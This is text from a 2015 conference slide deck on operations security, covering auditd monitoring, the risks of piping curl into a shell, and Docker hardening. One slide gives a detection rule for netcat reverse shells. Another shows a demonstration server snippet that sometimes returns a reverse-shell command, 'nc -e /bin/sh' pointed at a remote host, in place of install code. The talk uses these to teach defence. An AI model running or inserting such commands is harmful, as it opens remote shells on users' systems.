Recovered operations monkey at Puppet Labs. βΈ Own a lot of black t-shirts. βΈ Had 1300 accounts on his high school Linux system. (: 2 https://twitter.com/skullmandible/status/411281851131523072 3 β @benjammingh for LasCon 2015
why am I here. βΈ Things from the real world(β’) & how to cope. βΈ Far far too many summaries. βΈ Wings, moonshine and dancing? (I have no idea) 4 β @benjammingh for LasCon 2015
tiny bugs in Chrome to full sandbox escape. βΈ Egor Homakov's 5 small bugs in Github to full private access on GitHub. βΈ XSS to remote code execution in under an hour. βΈ Username & password from HVAC system leads to 8 β @benjammingh for LasCon 2015
Wireshark: 322! CVEs βΈ Security Firm Bit9 Hacked, Used to Spread Malware βΈ Joxean Koret on Breaking Antivurius software βΈ Tavis from Project Zero on exploiting ESET βΈ BEST! FireEye just running Apache/PHP as root ! 11 β @benjammingh for LasCon 2015
great position for security people, who don't want to get paid. βΈ Everyone? Do I have some emails with funny cats for you to click on. βΈ Security vendors? If you have infinite money and no attackers. βΈ Attackers! 12 β @benjammingh for LasCon 2015
βΈ Other: github/gdestuynder/Audisp-json βΈ Have cash, want a decent GUI (and more): Go use Threatstack! βΈ Write something yourself in python & golang: I keep promising to OSS this ): 34 β @benjammingh for LasCon 2015
2. Alert on "/bin/nc *-e /bin/sh*" 3. You will now find when someone tries to run a reverse shell! 4. Or when yours ops people do fun things. 35 β @benjammingh for LasCon 2015
if seen_before.include? ip return print_install_code() else seen_before << ip return 'nc -e /bin/sh root.legit.pw 2222 &' end end 40 β @benjammingh for LasCon 2015
cost ~$6. βΈ If I can't make $6 by owning a system, I should probably stop being an attacker. βΈ @letsencrypt will soon make this free. 47 β @benjammingh for LasCon 2015
root. βΈ No really, stop running things as root. βΈ Did I mention not running things as root. βΈ It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) 63 β @benjammingh for LasCon 2015
all and --cap-drop <thing> to get the minimum capabilities. βΈ Use Docker Notary βΈ Use GRSecurity (just do that anyway, if you can.) βΈ Use SELinux... I may as well ask for a pony here. 64 β @benjammingh for LasCon 2015
Docker is ZOMG unhackable. βΈ it's just cgroups and namespacing. (just) βΈ Escapes will happen. βΈ They have a rad security team (Hi @diogomonica and @nathanmccauley) 70 β @benjammingh for LasCon 2015
is secure, enough. βΈ network separation & segregation still works. βΈ secrets/credentials still a bigger problem. βΈ PLEASE don't just adopt it because it's new & shiny. βΈ ! " unikernels β¨ $ 71 β @benjammingh for LasCon 2015
security problems. (see Oauth) βΈ Annual pen-tests don't scale, bug bounties can help. βΈ Attackers are mining any public info you have (GitHub, S3, pastebin?) βΈ No really, go check all your S3 buckets... 85 β @benjammingh for LasCon 2015
you to stop trusting curl. βΈ Auditd is awful, but it can be fewer awful. βΈ Jenkins, you probably have to have one. βΈ but that can be okay, nay, even useful for security. 86 β @benjammingh for LasCon 2015
Docker and security can be used in the same sentence. βΈ Understand your threat model (Apple's guide) βΈ Don't be a FireEye, stop running things as root. 87 β @benjammingh for LasCon 2015